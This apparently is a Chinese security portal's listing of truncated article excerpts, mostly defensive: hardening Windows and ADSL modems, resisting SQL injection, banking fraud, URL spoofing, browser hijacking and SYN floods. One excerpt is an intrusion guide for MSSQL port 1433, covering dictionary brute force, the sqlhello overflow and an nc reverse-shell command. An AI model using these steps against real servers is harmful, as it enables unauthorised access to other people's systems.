一家网络安全公司日前警告称,Google的博客网站(www.blogger.com)存在大量用来传播恶意软件的虚假博客。 据报道,一些看似真实的博客,其主题涉及《星球大战》、学校、家具、圣诞节、汽车和女友等,其实包藏了大量各种类型的以脚本启动的恶意软件。Google博客服务中这样的网站现在有数百个之多,而且用户在访问这些网站
希望对新手入侵有帮助! 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc vv l p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (
由于现在家用电脑所使用的操作系统多数为Win XP 和Win2000 pro(建议还在使用98的朋友换换系统,连微软都放弃了的系统你还用它干嘛?)所以后面我将主要讲一下基于这两个操作系统的安全防范。 个人电脑常见的被入侵方式: 谈到个人上网时的安全,还是先把大家可能会遇到的问题归个类吧。我们遇到的入侵方式大概包括了
我的ADSL“猫”受到了攻击,为此我让小猫好好地修炼了一番“内功”,安全“功力”大长。下面给大家介绍一下“修炼秘技”。 最近我的ADSL Modem经常出现问题,有时开机能够正常工作,但大部分时间连网页都打不开,过一会儿重启ADSL Modem又正常了。开始还以为是ISP出问题了,打电话询问,被告知局端一切正常,可能是我的
这几天着实为sql注入漏洞伤了神,网上的代码好多不是很深奥就是麻烦终于找到了万能防注代码,分享了,呵呵操作简单上手,只要来个包含或放入conn.asp中,搞定末了,估计还有一些危险字符没有放全,帮我补全一下,谢谢了<%''''''''定义部份Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr''''''''自定义需要过滤的字串,用
你的系统是不是XP SP1,但是安装了2005瑞星杀毒软件后总是提示系统有 MS4011 Exploit 和Blaster Rpc Exploit 两个漏洞…… 最直接的办法,把系统不用的端口都关闭掉,然后从新启动,如果瑞星还提示有漏洞攻击,你没法子了,注:关闭的端口有,135,137,138,139,445,1025,2475,3127,6129,3389,593,还有tcp.
随着网络购物、网上支付等业务被广泛的应用,网络银行在人们的日常生活中已经起到越来越重要的作用,这对于黑客们来说无疑是个“好”消息,他们利用人们的疏忽大意,盗取网银密码,狠狠地捞上一把。今天笔者向大家介绍几个防范网银诈骗的招数,希望大家能够提高警惕,保护好财产。 反黑专家提示网民“三大注意” 首先,用户
看清楚再点 对URL欺骗说不URL欺骗一般有何表现形式,该如何防范? 最简单的URL欺骗就是注册一个与用户熟悉的域名相近的域名。像之前有人冒冲网上银行就属于典型的URL欺骗,这种方法虽然显得没有多少技术含量却很有效。因为用户在点击某个链接后,一般是不会核对URL是否真实。 URL并不能和域名安全划等号,也就是说URL
在正式进行各种“黑客行为”之前,黑客会采取各种手段,探测(也可以说“侦察”)对方的主机信息,以便决定使用何种最有效的方法达到自己的目的。来看看黑客是如何获知最基本的网络信息——对方的IP地址;以及用户如何防范自己的IP泄漏获取IP “IP”作为Net用户的重要标示,是黑客首先需要了解的。获取的方法较多,黑客也会因
现在,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”,要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。 一、取消文件夹隐藏共享 如果你使用了Windows 2000/XP系统,右键单击C盘或者其他
害人之心不可有,防人之心不可无!黑客盛行的今天,提高自身的防范等级是第一要务。但不能只停留在口号上,必须采取严密的技术手段。以我们最为常用的各种密码为例,如何既防明眼偷窥又防黑客软件暗查呢?本文就教你一绝招,使你的密码更安全! 为安全起见,计算机中密码的输入和保存都是以“*”号来显示的。这样,他人无法
参考了网络上很多关于WIN2003的安全设置以及自己动手做了一些实践,综合了这些安全设置文章整理而成,希望对大家有所帮助,另外里面有不足之处还请大家多多指点,然后给补上,谢谢!一、系统的安装 1、按照Windows2003安装光盘的提示安装,默认情况下2003没有把IIS6.0安装在系统里面。2、IIS6.0的安装 开始菜单—&
编者按:浏览器劫持,一个很热门的话题。要想让自己的浏览器别在被劫持了,那先让我们了解一下,浏览器是如何被劫持的吧! 一. 我的浏览器怎么了? 今天是大年初二,王先生家中来了许多客人,把平时埋头于工作的王先生弄了个手忙脚乱,由于客人带来的几个小孩子嚷嚷着要出去上网,王先生只好把寝室里的电脑让给了这一群孩子
·黑客入侵的“可行性报告” 万象网吧管理系统是众多网吧采用的一款软件,也是由于此,很多黑客就想出了破解它的方法,有的甚至入侵到网吧服务器,获得管理员的权限,以至于控制整个网吧!网管朋友要想高效保护网吧服务器,那就要先了解黑客入侵的方法,这样才能做到有效保护网吧全。 首先,黑客选定一家网吧,当他
比如.我用3389远程登陆了你的机器..你一般用什么办法.查到我?我如果把GUEST改为管理权限..那你又怎么办? 而且.我会清空日志的.. "回复:我入侵你 !你怎么查到我?"1、检查系统密码文件 :查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。输入命令 awk –F:’$3==0 ’ /etc/passwd来检查一下passwd文件中有哪些
一招:屏幕保护 在Windows中启用了屏幕保护之后,只要我们离开计算机(或者不操作计算机)的时间达到预设的时间,系统就会自动启动屏幕保护程序,而当用户移动鼠标或敲击键盘想返回正常工作状态时,系统就会打开一个密码确认框,只有输入正确的密码之后才能返回系统,不知道密码的用户将无法进入工作状态,从而保护了数据的
随着各地ADSL网络的蓬勃发展,实现永久连接、随时在线已不再是遥远的梦,但是,我们必须明白,永久连入Internet同样也意味着遭受入侵的可能性大大增加。知己知彼,方能百战不殆,让我们了解一下黑客入侵ADSL用户的方法和防范手段吧。 黑客入侵ADSL用户的方法 在很多地方都是包月制的,这样的话,黑客就可以用更长的
Windows消息钩子一般都很熟悉了。它的用处很多,耳熟能详的就有——利用键盘钩子获取目标进程的键盘输入,从而获得各类密码以达到不可告人的目的。朋友想让他的软件不被别人的全局钩子监视,有没有办法实现呢?答案是肯定的,不过缺陷也是有的。 首先简单看看全局钩子如何注入别的进程。 消息钩子是由Win32子系统提
最近盗号很猖獗,大家一定要小心看管自己的账号!这里有一些小技巧希望大家能注意下。 1、公共场所上网、下机前,务必重起电脑 相信现在网吧电脑都100%安装了还原系统,重起电脑基本可以杜绝菜鸟级别的盗号手段。 2、上网过程中,坚决不打开别人发你的不明链接 记得有一次,正跟玩魔力的朋 友QQ聊天。他莫名其
虚拟主机服务商在运营过程中可能会受到黑客攻击,常见的攻击方式有SYN,DDOS等。通过更换IP,查找被攻击的站点可能避开攻击,但是中断服务的时间比较长。比较彻底的解决方法是添置硬件防火墙。不过,硬件防火墙价格比较昂贵。可以考虑利用Linux系统本身提供的防火墙功能来防御。 1. 抵御SYN SYN攻击是利用TCP/IP协议3次握手